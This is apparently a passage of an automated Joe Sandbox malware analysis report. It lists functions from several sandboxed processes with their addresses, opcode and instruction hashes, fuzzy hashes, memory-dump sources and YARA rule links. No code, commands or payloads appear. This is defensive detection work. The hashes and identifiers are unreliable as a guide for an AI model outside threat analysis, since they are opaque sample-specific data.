Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAB3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: 603bec44fd0a14084be405ccafd15459f321dc49df9fa70c445e0d7c55e1444e
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: 33E01220F1913E4BF774AB94C8603BA6191AF94300F1200B9D51DA32E2DDB86E818F44

Function 00007FFD9BAEDA09 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd8f9725ad66c7ad0fb16bf7ee3e93111b0d50c9f42477c9a33b024190476b5
Instruction ID: 0d478dd234a12840d08de9bad55dce72f6492ac0557d30405ee10a661254f31d
Opcode Fuzzy Hash: afd8f9725ad66c7ad0fb16bf7ee3e93111b0d50c9f42477c9a33b024190476b5
Instruction Fuzzy Hash: A9E0462194E7C44FC70B9B3088A88943F609E2B21078A80EFC085CF2B3EA298849C702

Function 00007FFD9BAED989 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e689fd49f99f0597acfde2e6e0d3ce873ed7201c8551e3a3856d87cb7d7173
Instruction ID: 8653c833ce6969302e47ff345abd559f35e115d9f89ddea2ed028158e997a871
Opcode Fuzzy Hash: c2e689fd49f99f0597acfde2e6e0d3ce873ed7201c8551e3a3856d87cb7d7173
Instruction Fuzzy Hash: 62E01A2194F7C04FC70B9B3588699447F609E2721074A40EFC085CF5B3E9298849C712

Function 00007FFD9BAE9449 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14829e0cb105ee8d11e6ad1d02fd0f4ace460c5d298b9d773908629549d5320
Instruction ID: 4f1a09b716865c9737101c73354ade0971d3ccd631709a0be14be77b391cca83
Opcode Fuzzy Hash: e14829e0cb105ee8d11e6ad1d02fd0f4ace460c5d298b9d773908629549d5320
Instruction Fuzzy Hash: EFE0123054D6844FC70A9B34C8A99903FB0EF67215B8A01D7C045CB5B3D61D9C49C751

Function 00007FFD9BAE2170 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAEBC08 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction ID: 7e9f0635ee626ed270a1b0dd52f30db4e1c5ac1181242ce1d3e56ff1c3d03a17
Opcode Fuzzy Hash: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction Fuzzy Hash: 23D02230B508040FC70CBB388C588343390EB6A2027C100A8D00ACB2B5D96ADC88C741

Function 00007FFD9BAE73E8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: d05df94c20911b878a8769cbe63ec2ce94efe51993079f40d22b77b40fbb7cdf
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: 93D01235B519044FC71CA738989D8747391EB6A21679540A9D00AC72B1D96ADD89CB41

Function 00007FFD9BAC4EAB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction ID: 49a7f575056c7a69c9ec9aed29604974be0198e72e31d262c8ee69d81674c5c1
Opcode Fuzzy Hash: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction Fuzzy Hash: 4BD05B31B1D51EC7FAB4FB9854602F96260AF44304F120478D41D831F7CE696F025689

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: e5d351356e2d5641432ef330e74628a354c33c02fb27340905700f44cac165af
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: C3C00205F5B52E01E43573AB54660ACA1409BD5A10FD70176D529900A198DD22D5095A

Function 00007FFD9BAB05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: b1e87a13519ebbfe8bb18a621cb3bba385a2b548f07e6c5e4e69379d8009ece4
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: ECB09231EABA1E81DA3933B588620687150AB45204FE602B5D429801A1E8EF56D74A42

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 8496adba37a8fc4f0301b980a15ec7fd161aeee609ba40c3e87c639e8d89e795
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: 6EB01200D5741F01E43433FB089206870409B44100FC300B0D41E900A198CD13D40646

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAB0B4E
#{9, xrefs: 00007FFD9BAB0B3E
"s9, xrefs: 00007FFD9BAB0B46
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000033.00000002.2331538149.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_51_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction ID: adfb4375f6f4ac5f4da22a464742b246a025fa1b39eefa7662677e7b1c5d80c8
Opcode Fuzzy Hash: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction Fuzzy Hash: 31518E06B0957646E23973FD78219E9AB449FA927FB0847B7F56E8D0C74C486081C3E9

Analysis Process: 4Awb1u1GcJ.exePID: 5024, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAA0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d503083c077f9f4b6b30bf8540cb24211aa32e856f262ce1d61adf23fd1f1ed8
Instruction ID: 6c3050d3a0d02a9753afdef79deeb15043eaad03a6fb20dc720669ec3317e652
Opcode Fuzzy Hash: d503083c077f9f4b6b30bf8540cb24211aa32e856f262ce1d61adf23fd1f1ed8
Instruction Fuzzy Hash: C791F472A18A894FE759DB6888657A8BFE1FF99314F0441BED04DD77EACEB41804CB40

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c29c8855ca15d9aaf069595e2468fd402b4270572c469c53ff6e324b8072f09a
Instruction ID: fdf627282a62f9e97cf969c41ac6515df57503e944e5532d9e450f7d9f2ee3cb
Opcode Fuzzy Hash: c29c8855ca15d9aaf069595e2468fd402b4270572c469c53ff6e324b8072f09a
Instruction Fuzzy Hash: 8B412A22B0C5690EE318F7BC64A56FD7781DF9933AF4405BBE40DCB1DBCD1868418294

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1a50819c5dfba8018268d2becf02ff72f4f4e64f4f903193b7f24336398864
Instruction ID: 8560af05334a94becaa19c101f8f725f1d58942c987463ed54aacc3b67a47271
Opcode Fuzzy Hash: 3c1a50819c5dfba8018268d2becf02ff72f4f4e64f4f903193b7f24336398864
Instruction Fuzzy Hash: B5315932B0E24D8FE731ABA888612EC7B61EF41325F0541B7D05CCE1D3D97826898764

Function 00007FFD9BAA11A1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd369b30ef939a2284d9daf035c1056e193e922f8798f42840e6ab2f26a0b67
Instruction ID: 418908f2d53a1d8c7e67507e500fa98ac1b02f7596d1a172e80ca4be0dc53190
Opcode Fuzzy Hash: 8fd369b30ef939a2284d9daf035c1056e193e922f8798f42840e6ab2f26a0b67
Instruction Fuzzy Hash: 4531A630A0D68E8FDB55EB68C8649B87BF1EF6A300B0505BBC049D71F2DA68A941C750

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7839d1c9658bb1c84f26d329c3a780ef81dc908c457dc8fcb422633bd3dea03c
Instruction ID: 5c859acb7c06b63c90b5ab3500874161dc3619d9cf5b82ba32514815c1960c1d
Opcode Fuzzy Hash: 7839d1c9658bb1c84f26d329c3a780ef81dc908c457dc8fcb422633bd3dea03c
Instruction Fuzzy Hash: 5C212521B1891D0FE798A76C946AB7972C3EF98325F4500BAE40DC32EADC64AC024295

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0dc4143c72bb0363e1ebaf4a4762f3d1d13a42b0a9ebeb4bc7abb50b49e507
Instruction ID: 4f12c74ba02607cb46a49697d9b9faf472e583c1e9a0e61d44faacc3776a33fb
Opcode Fuzzy Hash: cf0dc4143c72bb0363e1ebaf4a4762f3d1d13a42b0a9ebeb4bc7abb50b49e507
Instruction Fuzzy Hash: 8811C635B0E68D8FE722DFA888601DC7FB1EF42711F0645B7D048DB1A2D574264987A4

Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2b2260125ad798dfec318d72ad30f4b1834dee8cf851a4a33cf9dc05d25854
Instruction ID: b548bc9ee62cb2f2a004597ee8bfda9d349d92b29999b9c40b471c64d5ca0bb6
Opcode Fuzzy Hash: 3c2b2260125ad798dfec318d72ad30f4b1834dee8cf851a4a33cf9dc05d25854
Instruction Fuzzy Hash: 2B11A135A0E28D8FE722DFA888601DC7FB1EF42711F0645F7D048DB1A2D5746A498764

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c456b5a8eb09190fae2aa5bd65d95cde7727b2d5406b561aa75ef31e7233462c
Instruction ID: 8634a9828b29153f75f5a221ed0ff5fd826e7c3aaf017be854844778d49693c9
Opcode Fuzzy Hash: c456b5a8eb09190fae2aa5bd65d95cde7727b2d5406b561aa75ef31e7233462c
Instruction Fuzzy Hash: 1D019235A0E38D9FD722DFA4C85019CBFB1AF02710F1641E7D048DB1A2D5746A458760

Function 00007FFD9BAA6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdf9a90c4118c413cbbf1f4690e9006876b37c4401c586929626263f9a8f5cb
Instruction ID: 96e343520aff4bb06b37e2a9842e99065bea37a7fa30cbe73d89e36a1e1b1868
Opcode Fuzzy Hash: 9cdf9a90c4118c413cbbf1f4690e9006876b37c4401c586929626263f9a8f5cb
Instruction Fuzzy Hash: 76F0E130648A188FCF54DF48C499EA973F1FBA8301F114199D44AD72A1DB74EAC5CF51

Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a29d3aa9ee067f7f11d92f2d8b3db11192869e273f91d1fadcb64056943982a
Instruction ID: 1cb46c7cbbd4ea7831ba37085f71d5ea975e002a8c998d209813b43268370c44
Opcode Fuzzy Hash: 9a29d3aa9ee067f7f11d92f2d8b3db11192869e273f91d1fadcb64056943982a
Instruction Fuzzy Hash: D3F0E53925D649CFC741DB7DC8A44C5BBA0FF07224B5505EAD088CB5A2D321686DCB41

Function 00007FFD9BAA3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: d8b6e6f16910596ff65a622c659d9e2abcdc2fa5317d4ca2f4daab21210b16c0
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: F2E01220F0911E4BF774A794C8603BA6293AF94700F161075D50DA32E2DDB86E418B65

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: fc6e5de9e4a4654ab832ed91f76fd0e3d6e2d7465cfebe5589d431f68fb8de25
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: 6DC00205F5B51E01E43573AA54A60ACA2425BD5E14FD70172D50D800A198DD22D9016A

Function 00007FFD9BAA05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: 652ea10c52ffa20c8ec8e7548dba18ebf54a042ef08a74113ba241b2649e3ee6
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: E5B09220E9BA0E81DA3933B588620687592AB46204FE602B5D409801E1E9EE9ADA8252

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 2b8641a9fb50c6bc518600db577bc35ca8ea7f198f0be71e3462a223b1cab8ac
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: 72B01200E5740F01E43433FA08E2068B0415B44200FC300B0D40D800A198CD23D80267

Non-executed Functions

Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAA0B4E
c9, xrefs: 00007FFD9BAA0B56
"s9, xrefs: 00007FFD9BAA0B46
#{9, xrefs: 00007FFD9BAA0B3E

Memory Dump Source

Source File: 00000034.00000002.2502034709.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_52_2_7ffd9baa0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 9de72eb67737fbf9b4055a9d580ec46745a88977598c24b2dc03a6593a0eaec5
Instruction ID: c9a3779ab17342d315d4b553fd8b5d3b257179e0372b3fab416c1ae6281bda51
Opcode Fuzzy Hash: 9de72eb67737fbf9b4055a9d580ec46745a88977598c24b2dc03a6593a0eaec5
Instruction Fuzzy Hash: 3151BB17B0946745E339B3FD78219E96B449FA823FB0847B7F95E8D0C78D086486C2E9

Analysis Process: hxpWOXgnBGVLArPcwqxpuA.exePID: 7036, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAC0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93baca13b6fd7d08b70ffdddedcfb5dd638b87800a17f25805d91a5828670a00
Instruction ID: e0781572946cb194c707d9db72b3f658f2ec7568eb9b91f2a06e7ce79d105601
Opcode Fuzzy Hash: 93baca13b6fd7d08b70ffdddedcfb5dd638b87800a17f25805d91a5828670a00
Instruction Fuzzy Hash: 0491E272A19A8D8FE799EB6888657A87FE0FF59314F4002BED049C72E6CFB41404C740

Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb9a3d0e69ae8dcdf037acd1cb48f3165a07fdede69be04265740c5d623a95d
Instruction ID: 93219ecfad6c70c909e93293ecd51cc7632b3b53ea533ded5e548e722ee9da0a
Opcode Fuzzy Hash: aeb9a3d0e69ae8dcdf037acd1cb48f3165a07fdede69be04265740c5d623a95d
Instruction Fuzzy Hash: D6412922B0D52D0EE718F7BC64A56FD7781DF9933AB0446BBE40DCB1DBCD19A8418285

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f36aa95573d861e0bbbe2e3f772f5f207e898f0c764dcfd5c8117d3f161d7a
Instruction ID: 3f51e2b4e489ec23d9b57857f7640e5127bb5ab8dc1f9f0ae208a71eb06f5a60
Opcode Fuzzy Hash: d7f36aa95573d861e0bbbe2e3f772f5f207e898f0c764dcfd5c8117d3f161d7a
Instruction Fuzzy Hash: D6312931B0E28D8EE731BBA888655FC7BA0EF52725F0542F7D0588B1D3D97826458745

Function 00007FFD9BAC0998 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b198102328f5395c424f55ca52d26a35d8849579b736b9c3ca7575d925b690a
Instruction ID: a4c2c0a3e1ed816996e7d434ad360efb583b5cedb9a2cca3c9f30deebb84ae40
Opcode Fuzzy Hash: 0b198102328f5395c424f55ca52d26a35d8849579b736b9c3ca7575d925b690a
Instruction Fuzzy Hash: 57214C20F1C91D0FE798BB6C946A77972C6DF98325F5140BAE40DC32F7DD55AC428285

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578bcb00caa3f27028baef91f730f187c92995e63e3d7b7df5c30d363abb368d
Instruction ID: 86b56bdcac02f5e54fc12cead65d8f6af6f6fae5465343683445fe9610647336
Opcode Fuzzy Hash: 578bcb00caa3f27028baef91f730f187c92995e63e3d7b7df5c30d363abb368d
Instruction Fuzzy Hash: AD11A335A0E68D8FE722EBA888611EC7FB0EF52711F0646F7C054DB2A3D97826458784

Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59eda4c82cce73f8716066a90e9bb41e2da3e3df6ce8fe0a9589c178ab3114f6
Instruction ID: 9cffb682026a3240766b03e846e6305cc11ae51ba53d2351fec4dc5aeb1e04f1
Opcode Fuzzy Hash: 59eda4c82cce73f8716066a90e9bb41e2da3e3df6ce8fe0a9589c178ab3114f6
Instruction Fuzzy Hash: 5E11A135A0E28D8FE722EBA8C8601EC7FB0EF52711F0642F7D454DB2A3D97866458784

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000035.00000002.2636070357.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_7ffd9bac0000_hxpWOXgnBGVLArPcwqxpuA.jbxd

Similarity

API ID:
String ID:
API String ID:
